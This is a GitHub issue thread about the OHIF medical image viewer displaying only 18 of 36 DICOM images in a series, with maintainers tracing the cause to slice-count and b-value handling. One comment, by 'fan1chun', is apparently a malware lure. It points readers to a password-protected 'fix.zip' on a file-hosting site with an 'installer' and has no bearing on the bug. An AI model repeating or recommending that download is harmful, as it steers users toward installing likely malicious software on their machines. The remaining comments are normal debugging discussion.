### ISSUE TITLE
[Bug] There is incomplete display of series images in latest version

### ISSUE THREAD

**Issue by IT-Highmore** [OHIF/Viewers#4351]
### Describe the Bug

 Here is the resource: 
[1.2.194.0.108707908.20231128085204.1937.11.2265108.zip](https://github.com/user-attachments/files/16795056/1.2.194.0.108707908.20231128085204.1937.11.2265108.zip)

When I upload a set of dicom images, I find that one series images is not fully displayed. It has 36 images, but only displayed 18 images.
![Viewer3](https://github.com/user-attachments/assets/fe9bc53c-00b1-4930-a1dc-37a0b310ebfd)

So I checked it in other software, all are displayed normally even in Viewer2.
![1](https://github.com/user-attachments/assets/28b18d51-1b5c-4e7e-ab86-ea4616afc63b)
![2](https://github.com/user-attachments/assets/402fbfff-6aa6-47c0-86de-8feb3de57eaf)
![4](https://github.com/user-attachments/assets/f54410d3-2318-49e2-9711-b10d718379e2)

I found the numberOfSlices in
https://github.com/cornerstonejs/cornerstone3D/blob/e14af95b33e92828f3e0c8c21f0dc9319647abda/packages/core/src/utilities/getImageSliceDataForVolumeViewport.ts#L42 ,

![image](https://github.com/user-attachments/assets/f60720f8-851a-4340-977f-1e43344532fc)

How to deal with this situation when the calculated results do not match the actual?
### Steps to Reproduce

1. Download the resource, and  Upload to [viewer.ohif.org/local](https://viewer.ohif.org/local)
2. select basic viewer, checkd DWI_og images

### The current behavior

only displayed 18 images

### The expected behavior

displayed 36 images

### OS

Windows 11

### Node version

18.17.0

### Browser

Chrome 127.0.6533.120

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sedghi** [comment]
Can you check the latest OHIF viewer, which now includes Cornerstone 3D 2.0?

Here are the migration guides:

Try OHIF locally: [https://viewer-dev.ohif.org/localbasic](https://viewer-dev.ohif.org/localbasic)<br>Try Cornerstone3D 2.0 locally: [https://www.cornerstonejs.org/live-examples/local.html](https://www.cornerstonejs.org/live-examples/local.html)

[https://docs.ohif.org/migration-guide/3p8-to-3p9/](https://docs.ohif.org/migration-guide/3p8-to-3p9/)

**Comment by IT-Highmore** [comment]
![image](https://github.com/user-attachments/assets/09b0b21b-6c86-4b38-8175-75e8c9d4e033)
![image](https://github.com/user-attachments/assets/3aa592f5-c5f7-4ea6-9cd5-79093453677d)
Maybe the problem still exists

**Comment by lscoder** [comment]
It seems to be related to #4232. `getDynamicVolumeInfo` from `'@cornerstonejs/streaming-image-volume-loader'` should be called only when 4D mode is loaded. Currently it may be getting called even in basic mode. If that is still an issue it should be changed to something like this #4294

**Comment by sedghi** [comment]
There was nothing wrong with out logic, we were just showing the first BVal, however, i made it show the cine player so that you can switch between them

**Comment by subhasishdash** [comment]
Created a new bug for another scenario for a similar bug.
https://github.com/OHIF/Viewers/issues/5174
